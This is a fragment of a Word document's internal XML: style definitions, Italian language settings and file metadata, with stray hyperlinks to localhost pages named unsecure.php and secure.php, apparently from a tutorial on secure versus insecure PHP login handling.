      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="it-IT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AD15F2"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="15"/>
      </w:numPr>
      <w:spacing w:line="216" w:lineRule="auto"/>
      <w:jc w:val="both"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:lang w:val="it-IT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Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D87CC4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89124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A3A3C"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Code1">
    <w:name w:val="Code 1"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Code1Char"/>
    <w:qFormat/>
    <w:rsid w:val="00657642"/>
    <w:pPr>
      <w:spacing w:line="216" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="it-IT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6717B"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Code1Char">
    <w:name w:val="Code 1 Char"/>
    <w:basedOn w:val="ListParagraphChar"/>
    <w:link w:val="Code1"/>
    <w:rsid w:val="00657642"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="22"/>
      <w:lang w:val="it-IT"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00C300A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555E5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D4263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D555E5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555E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customStyle="1" w:styleId="line">
    <w:name w:val="line"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00127B95"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
    </w:pPr>
    <w:rPr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406A2B"/>
    <w:rPr>
      <w:b/>
      <w:bCs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unsecure.php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unsecure.php?username=admin&amp;password=Admin2026%21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localhost:8080/secure.php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3D4A3-6D24-4F3E-9232-E4693138F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10</Pages>
  <Words>2082</Words>
  <Characters>11870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Francesco Pagliaccia</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <cp:lastPrinted>2026-06-11T10:18:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-10T18:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-11T12:09:00Z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1.39.0</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="SuperdocDocumentOrigin">
    <vt:lpwstr>google-docs</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="DocumentGuid">
    <vt:lpwstr>9e0030b0-3e40-46b7-b618-667db8e92bb3</vt:lpwstr>
  </property>
</Properties>
</file>